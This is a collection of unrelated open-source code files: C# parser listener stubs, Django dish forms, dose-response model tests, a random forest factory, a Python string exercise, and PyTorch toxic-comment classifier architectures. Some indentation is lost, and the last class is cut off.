def enterMember_access2(self, ctx: CSharp4Parser.Member_access2Context):
pass
# Exit a parse tree produced by CSharp4Parser#member_access2.
def exitMember_access2(self, ctx: CSharp4Parser.Member_access2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_invocation2.
def enterMethod_invocation2(self, ctx: CSharp4Parser.Method_invocation2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_invocation2.
def exitMethod_invocation2(self, ctx: CSharp4Parser.Method_invocation2Context):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression2.
def enterObject_creation_expression2(self, ctx: CSharp4Parser.Object_creation_expression2Context):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression2.
def exitObject_creation_expression2(self, ctx: CSharp4Parser.Object_creation_expression2Context):
pass
# store/forms.py (salemzii/ChopFast, MIT license)

from django import forms

from .models import Dish


class AddDish(forms.ModelForm):
    class Meta:
        model = Dish
        fields = ['name', 'description', 'image', 'price']
        widgets = {
            'name': forms.TextInput(attrs={'class': 'form-control', 'id': 'name'}),
            'description': forms.TextInput(attrs={'class': 'form-control', 'id': 'description'})
        }


class EditDish(forms.ModelForm):
    class Meta:
        model = Dish
        fields = ['name', 'description', 'image', 'price', 'available']
        widgets = {
            'name': forms.TextInput(attrs={'class': 'form-control', 'id': 'name'}),
            'description': forms.TextInput(attrs={'class': 'form-control', 'id': 'description'})
        }
# tests/bmds2/test_dfile_dichotomous.py (shapiromatron/bmds, MIT license)

from bmds import bmds2


def test_Logistic_215(ddataset):
    model = bmds2.models.Logistic_215(ddataset)
    dfile = model.as_dfile()
    expected = "Logistic\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 0 0 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_LogLogistic_215(ddataset):
    model = bmds2.models.LogLogistic_215(ddataset)
    dfile = model.as_dfile()
    expected = "LogLogistic\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_Gamma_217(ddataset):
    model = bmds2.models.Gamma_217(ddataset)
    dfile = model.as_dfile()
    expected = "Gamma\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_Probit_34(ddataset):
    model = bmds2.models.Probit_34(ddataset)
    dfile = model.as_dfile()
    expected = "Probit\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 0 0 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_Multistage_34(ddataset):
    model = bmds2.models.Multistage_34(ddataset)
    dfile = model.as_dfile()
    expected = "Multistage\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4 2\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_MultistageCancer_34(ddataset):
    model = bmds2.models.MultistageCancer_34(ddataset)
    dfile = model.as_dfile()
    expected = "Multistage-Cancer\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4 2\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_Weibull_217(ddataset):
    model = bmds2.models.Weibull_217(ddataset)
    dfile = model.as_dfile()
    expected = "Weibull\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_LogProbit_34(ddataset):
    model = bmds2.models.LogProbit_34(ddataset)
    dfile = model.as_dfile()
    expected = "LogProbit\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected


def test_DichotomousHill_13(ddataset):
    model = bmds2.models.DichotomousHill_13(ddataset)
    dfile = model.as_dfile()
    expected = "Dichotomous-Hill\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999 -9999\n0\n-9999 -9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35"  # noqa
    assert dfile == expected
# model/Random_Forest.py (UrosOgrizovic/FIFA-19-player-position-predictor, MIT license)

from sklearn.ensemble import RandomForestClassifier


def random_forest():
    return RandomForestClassifier(n_estimators=100, oob_score=True)
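The `oob_score=True` flag above asks the forest to score each tree on the training rows its bootstrap sample happened to miss. A stdlib-only sketch (the `oob_fraction` helper is illustrative, not part of scikit-learn) shows why roughly a third of the rows are left over for that check:

```python
import random


def oob_fraction(n_samples: int, seed: int = 0) -> float:
    """Fraction of rows left out of one bootstrap sample of size n_samples."""
    rng = random.Random(seed)
    # Bootstrap = draw n_samples rows *with replacement*; duplicates collapse
    # in the set, so the rows never drawn are the out-of-bag rows.
    drawn = {rng.randrange(n_samples) for _ in range(n_samples)}
    return 1 - len(drawn) / n_samples


# Each tree misses about 1 - 1/e (roughly 36.8%) of the training rows;
# those rows act as a free validation set for that tree.
frac = oob_fraction(10_000)
assert 0.33 < frac < 0.41
```

This is the mechanism behind the fitted estimator's `oob_score_` attribute: no held-out split is needed because every tree already has rows it never saw.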
# python--exercicios/ex026.py (Eliezer2000/python, MIT license)

frase = str(input('Digite algo : ')).upper().strip()
print('A letra A aparece na frase: {} vezes '.format(frase.count('A')))
print('Ela aparece primeiro na posição : {} '.format(frase.find('A')+1))
print('Ela aparece por último na posição : {}'.format(frase.rfind('A')+1))

frase = str(input('Digite uma frase : ')).upper().strip()
print('A letra A aparece na frase : {} vezes'.format(frase.count('A')))
print('Ela aparece primeiro na posição : {} '.format(frase.find('A')+1))
print('Ela aparece por último na posição : {} '.format(frase.rfind('A')+1))
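The exercise above leans on three standard `str` methods: `count`, `find`, and `rfind`. The `+1` in each `print` converts Python's 0-based index into the 1-based position shown to the user. A small self-contained sketch (the sample phrase is made up for illustration):

```python
phrase = "LEARN PYTHON".upper().strip()

# str.find / str.rfind return 0-based indexes (or -1 when the character
# is absent), so adding 1 yields a human-friendly 1-based position.
assert phrase.count("N") == 2
assert phrase.find("N") + 1 == 5      # first N, 1-based position
assert phrase.rfind("N") + 1 == 12    # last N, 1-based position
assert phrase.find("Z") == -1         # absent letters give -1, not an error
```

Note the `-1` sentinel: when the searched letter does not occur, the exercise's `+1` would print position 0, which is one quirk of this approach.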
# models.py (LordRaivo/ToxicBot, MIT license)

import numpy as np  # linear algebra
import torch
import torch.nn as nn
import torch.nn.functional as F

# [CNN, GRU, SelfAttention, XformEncoder, XformGru, GruAttention, HydraGruAttention, ResnetHydraGruAttn]
models = [
    'CNN',
    'GRU',
    'SelfAttention',
    'XformEncoder',
    'XformGru',
    'GruAttention',
    'HydraGruAttention',
    'ResnetHydraGruAttn',
]


class CNN(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, layers: int = 2, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(20_000, emb_dims)
        self.CNN = nn.Sequential(
            nn.Conv1d(emb_dims, hidden, 3),
            nn.Dropout(0.3),
            nn.ReLU(),
            nn.Conv1d(hidden, hidden, 3),
            nn.Dropout(0.3),
            nn.ReLU(),
            nn.AdaptiveMaxPool1d(1),
        )
        self.linear = nn.Sequential(
            nn.Dropout(0.3),
            nn.Linear(hidden, hidden),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x = torch.transpose(x, 1, 2)
        x = self.CNN(x)
        return self.linear(x[..., 0])


class GRU(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, layers: int = 1, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(20_000, emb_dims)
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden,
            num_layers=layers,
            bidirectional=True,
            dropout=0.3,
            batch_first=True,
        )
        self.linear = nn.Sequential(
            nn.Dropout(0.3),
            nn.Linear(hidden * 5, hidden),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        x, h = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=True)
        avg = x.mean(dim=1)
        max = x.max(dim=1)[0]
        x = torch.cat((h[-1], avg, max), dim=1)
        # x = F.relu(x)
        return self.linear(x)
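Several models in this file concatenate mean- and max-pooled recurrent states, and `pack_padded_sequence` is what keeps padding steps from contaminating those statistics. A stdlib-only sketch of the same pooling idea (the `pool_sequence` helper and its toy inputs are illustrative, not part of the model):

```python
def pool_sequence(states, length):
    """Mean- and max-pool the first `length` steps of a padded sequence.

    `states` is a list of per-timestep feature vectors; steps beyond
    `length` are padding and are ignored, mirroring what packing the
    sequence buys the GRU model above.
    """
    valid = states[:length]
    dims = len(valid[0])
    mean = [sum(v[d] for v in valid) / length for d in range(dims)]
    mx = [max(v[d] for v in valid) for d in range(dims)]
    return mean + mx  # concatenated, like torch.cat((avg, max), dim=1)


# Padded to 4 steps, but only the first 2 are real data:
feats = pool_sequence([[1.0, 4.0], [3.0, 2.0], [0.0, 0.0], [0.0, 0.0]], length=2)
assert feats == [2.0, 3.0, 3.0, 4.0]
```

Without the length mask, the zero padding would drag the mean toward zero and could dominate the max for negative features, which is exactly the failure mode packing avoids.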
class SelfAttention(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 256, heads=8, layers: int = 2, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(20_000, emb_dims)
        self.attn = nn.MultiheadAttention(
            embed_dim=emb_dims,
            num_heads=heads,
        )
        self.norm = nn.LayerNorm(emb_dims)
        self.linear = nn.Sequential(
            nn.Dropout(0.3),
            nn.Linear(emb_dims, hidden),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x = torch.transpose(x, 0, 1)
        attn, _ = self.attn(x, x, x)
        x = self.norm(x + attn)
        x = x.mean(0)
        x = self.linear(x)
        return x


class XformEncoder(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 1024, heads=8, layers: int = 1, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(20_000, emb_dims)
        self.encoder_layer = nn.TransformerEncoderLayer(
            d_model=emb_dims,
            nhead=heads,
            dim_feedforward=hidden,
        )
        self.encoder = nn.TransformerEncoder(
            encoder_layer=self.encoder_layer,
            num_layers=layers,
        )
        self.linear = nn.Linear(2 * emb_dims, classes)

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x = torch.transpose(x, 0, 1)
        x = self.encoder(x)
        x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
        x = self.linear(x)
        return x


class XformGru(nn.Module):
    def __init__(self, emb_dims=256, hidden: int = 256, heads=8, layers: int = 1, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(20_000, emb_dims)
        self.encoder_layer = nn.TransformerEncoderLayer(
            d_model=emb_dims,
            nhead=heads,
            dim_feedforward=hidden,
        )
        self.encoder = nn.TransformerEncoder(
            encoder_layer=self.encoder_layer,
            num_layers=layers,
        )
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden,
            num_layers=layers,
            bidirectional=True,
            dropout=0.3,
            batch_first=True,
        )
        self.linear = nn.Sequential(
            nn.Dropout(0.3),
            nn.Linear(hidden * 5 + 2 * emb_dims, hidden),
            nn.ReLU(),
            nn.Dropout(0.3),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        # Attention
        attn = torch.transpose(x, 0, 1)
        attn = self.encoder(attn)
        attn = torch.cat((attn.mean(0), attn.max(0)[0]), dim=1)
        # Gru
        gru = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        gru, gru_h = self.GRU(gru)
        gru, _ = nn.utils.rnn.pad_packed_sequence(gru, batch_first=True)
        gru = torch.cat((gru_h[-1], gru.mean(dim=1), gru.max(dim=1)[0]), dim=1)
        x = torch.cat((attn, gru), dim=1)
        x = self.linear(x)
        return x
class GruAttention(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 1, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=hidden * 2,
            num_heads=heads,
        )
        self.linear = nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 4, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attention
        x, _ = self.attn(x, x, x)
        x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
        x = self.linear(x)
        return x


class HydraGruAttention(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 1, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden // 2,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=hidden,
            num_heads=heads,
        )
        self.linear = nn.ModuleList([nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 2, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, 1),
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attention
        x, _ = self.attn(x, x, x)
        x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
        x = torch.cat([l(x) for l in self.linear], dim=1)
        return x


class AttnBlock(nn.Module):
    def __init__(self, emb_dims: int = 2048, kdim: int = None, vdim: int = None, heads: int = 8):
        super().__init__()
        self.act1 = nn.ReLU()
        self.attn1 = nn.MultiheadAttention(embed_dim=emb_dims, num_heads=heads, kdim=kdim, vdim=vdim)
        self.act2 = nn.ReLU()
        self.attn2 = nn.MultiheadAttention(embed_dim=emb_dims, num_heads=heads, kdim=kdim, vdim=vdim)

    def forward(self, x):
        skip = x
        x = self.act1(x)
        x, _ = self.attn1(x, x, x)
        x = self.act2(x)
        x, _ = self.attn2(x, x, x)
        return x + skip
class ResnetAttention(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 512, heads=8, layers: int = 16, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.attn = nn.Sequential(
            *(AttnBlock(emb_dims, heads=heads) for _ in range(layers)),
            nn.ReLU(),
        )
        self.linear = nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(emb_dims * 2, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, classes),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x = self.attn(x)
        x = torch.cat((x.mean(1), x.max(1)[0]), dim=1)
        x = self.linear(x)
        return x


class GruAttnBlock(nn.Module):
    def __init__(self, emb_dims: int = 512, hidden: int = 128, kdim: int = None, vdim: int = None, heads: int = 8, dropout: float = 0.3, **kwargs):
        super().__init__()
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden // 2,
            num_layers=1,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(embed_dim=hidden, num_heads=heads, kdim=kdim, vdim=vdim)
        self.act = nn.ReLU()

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attn
        x, _ = self.attn(x, x, x)
        x = self.act(x)
        x = torch.transpose(x, 0, 1)  # batch first
        return (x, lengths)


class ResnetHydraGruAttn(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 2, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.blocks = nn.Sequential(
            GruAttnBlock(emb_dims=emb_dims, hidden=hidden, heads=heads, dropout=dropout),
            *(GruAttnBlock(emb_dims=hidden, hidden=hidden, heads=heads, dropout=dropout) for _ in range(layers - 1)),
        )
        self.linear = nn.ModuleList([nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 2, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, 1),
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        x = self.embeddings(x)
        x, lengths = self.blocks((x, lengths))
        x = torch.cat((x.mean(1), x.max(1)[0]), dim=1)
        x = torch.cat([l(x) for l in self.linear], dim=1)
        return x
class DeepHydraGruAttnHead(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 1, dropout=0.3, **kwargs):
        super().__init__()
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=hidden * 2,
            num_heads=heads,
        )
        self.linear = nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 4, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, 1),
        )

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attention
        x, _ = self.attn(x, x, x)
        x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
        x = self.linear(x)
        return x


class DeepHydraGruAttn(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 2, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden // 2,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=hidden,
            num_heads=heads,
        )
        self.heads = nn.ModuleList([DeepHydraGruAttnHead(
            emb_dims=hidden, hidden=hidden, heads=heads, layers=layers, dropout=dropout,
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        lengths = lengths.cpu()
        x = self.embeddings(x)
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attention
        x, _ = self.attn(x, x, x)
        x = torch.transpose(x, 0, 1)
        x = torch.cat([h(x, lengths) for h in self.heads], dim=1)
        return x
class ToxicOnly(nn.Module):
    def __init__(self, *args, **kwargs):
        super().__init__()
        self.model = ResnetHydraGruAttn(*args, **kwargs)

    def forward(self, x, lengths=None):
        x = self.model(x, lengths)
        x[:, 1:] = 0  # zero every class logit except the first (toxic) one
        return x
class PureHydraGruAttn(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 2, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.heads = nn.ModuleList([DeepHydraGruAttnHead(
            emb_dims=emb_dims, hidden=hidden, heads=heads, layers=layers, dropout=dropout,
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        lengths = lengths.cpu()
        x = self.embeddings(x)
        x = torch.cat([h(x, lengths) for h in self.heads], dim=1)
        return x
class CNNGruAttn(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 2, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.CNN = nn.Sequential(
            nn.Conv1d(emb_dims, hidden, 3, padding=1),
            nn.Dropout(dropout),
            nn.ReLU(),
        )
        self.GRU = nn.GRU(
            input_size=hidden,
            hidden_size=hidden // 2,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=hidden,
            num_heads=heads,
        )
        self.linear = nn.ModuleList([nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 2, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, 1),
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        lengths = lengths.cpu()
        x = self.embeddings(x)
        # CNN
        x = torch.transpose(x, 1, 2)
        x = self.CNN(x)
        x = torch.transpose(x, 1, 2)
        # Gru
        x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
        x, _ = self.GRU(x)
        x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
        # Attention
        x, _ = self.attn(x, x, x)
        x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
        x = torch.cat([l(x) for l in self.linear], dim=1)
        return x


class CNNGruAttnSplit(nn.Module):
    def __init__(self, emb_dims=512, hidden: int = 128, heads=8, layers: int = 2, vocab_size=20_000, dropout=0.3, classes: int = 6, **kwargs):
        super().__init__()
        self.embeddings = nn.Embedding(vocab_size, emb_dims)
        self.CNN = nn.Sequential(
            nn.Conv1d(emb_dims, hidden, 3, padding=1),
            nn.Dropout(dropout),
            nn.ReLU(),
        )
        self.GRU = nn.GRU(
            input_size=emb_dims,
            hidden_size=hidden // 2,
            num_layers=layers,
            bidirectional=True,
            dropout=dropout,
            batch_first=True,
        )
        self.attn = nn.MultiheadAttention(
            embed_dim=emb_dims,
            num_heads=heads,
        )
        self.linear = nn.ModuleList([nn.Sequential(
            nn.Dropout(dropout),
            nn.Linear(hidden * 4 + emb_dims * 2, hidden),
            nn.ReLU(),
            nn.Dropout(dropout),
            nn.Linear(hidden, 1),
        ) for _ in range(classes)])

    def forward(self, x, lengths=None):
        if lengths is None:
            x, lengths = x
        lengths = lengths.cpu()
        x = self.embeddings(x)
        # CNN
        cnn_o = torch.transpose(x, 1, 2)
        cnn_o = self.CNN(cnn_o)  # (B, C, N)
        # Gru
        gru_o = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
        gru_o, _ = self.GRU(gru_o)
        gru_o, _ = nn.utils.rnn.pad_packed_sequence(gru_o, batch_first=False)  # (N, B, C)
        # Attention
        attn_o = torch.transpose(x, 0, 1)
        attn_o, _ = self.attn(attn_o, attn_o, attn_o)  # (N, B, C)
        x = torch.cat((
            cnn_o.mean(-1),
            cnn_o.max(-1)[0],
            gru_o.mean(0),
            gru_o.max(0)[0],
            attn_o.mean(0),
            attn_o.max(0)[0],
        ), dim=1)
        x = torch.cat([l(x) for l in self.linear], dim=1)
        return x
class CNNGruAttnCascade(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.CNN = nn.Sequential(
nn.Conv1d(emb_dims, hidden, 3, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = hidden+emb_dims,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden*2+emb_dims,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear((hidden*2+emb_dims)*4, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
cnn = torch.transpose(x, 1, 2)
cnn = self.CNN(cnn)
cnn = torch.transpose(cnn, 1, 2)
x = torch.cat((x, cnn), dim=2)
#Gru
gru = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
gru, _ = self.GRU(gru)
gru, _ = nn.utils.rnn.pad_packed_sequence(gru, batch_first=False)
x = torch.transpose(x, 0, 1)
x = torch.cat((x, gru), dim=2)
#Attention
attn, _ = self.attn(x,x,x)
x = torch.cat((x, attn), dim=2)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class FFTConv1d(nn.Conv1d):
    """Conv1d variant that evaluates the convolution in the frequency domain."""
    def _conv_forward(self, input, weight, bias):
        # Pad the input on both sides, then zero-pad the kernel up to the
        # padded input length so both rffts share the same transform size.
        input = F.pad(input, self.padding + self.padding)
        padded_weight = F.pad(weight, (0, input.shape[-1] - weight.shape[-1]))
        input_ft = torch.fft.rfft(input)
        weight_ft = torch.fft.rfft(padded_weight)
        # Pointwise product in frequency space, contracting the input-channel
        # axis (b): out_ft has shape (batch, out_channels, freq). Per the
        # convolution theorem this is a circular convolution of the padded input.
        out_ft = torch.einsum("ab..., cb... -> ac...", input_ft, weight_ft)
        # Request the padded length explicitly so odd-length inputs round-trip.
        out = torch.fft.irfft(out_ft, n=input.shape[-1])
        if bias is not None:
            out = out + bias[None, :, None]
        return out
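`FFTConv1d` leans on the convolution theorem: multiplying two DFTs pointwise and transforming back yields a circular convolution. A minimal pure-Python check of that identity (hypothetical `dft`/`idft`/`circular_conv` helpers, independent of torch):

```python
import cmath

def dft(x):
    n = len(x)
    return [sum(x[t] * cmath.exp(-2j * cmath.pi * k * t / n) for t in range(n))
            for k in range(n)]

def idft(X):
    n = len(X)
    return [sum(X[k] * cmath.exp(2j * cmath.pi * k * t / n) for k in range(n)).real / n
            for t in range(n)]

def circular_conv(x, w):
    # Direct circular convolution: y[t] = sum_s x[(t - s) mod n] * w[s]
    n = len(x)
    return [sum(x[(t - s) % n] * w[s] for s in range(n)) for t in range(n)]

x = [1.0, 2.0, 0.0, -1.0]
w = [0.5, 0.25, 0.0, 0.0]
via_fft = idft([a * b for a, b in zip(dft(x), dft(w))])
assert all(abs(a - b) < 1e-9 for a, b in zip(via_fft, circular_conv(x, w)))
```

Note that `nn.Conv1d` computes a cross-correlation with a finite output length, so `FFTConv1d` is not a drop-in numerical match for it; the module above keeps the full circular result by design.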
class FFTCNNGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
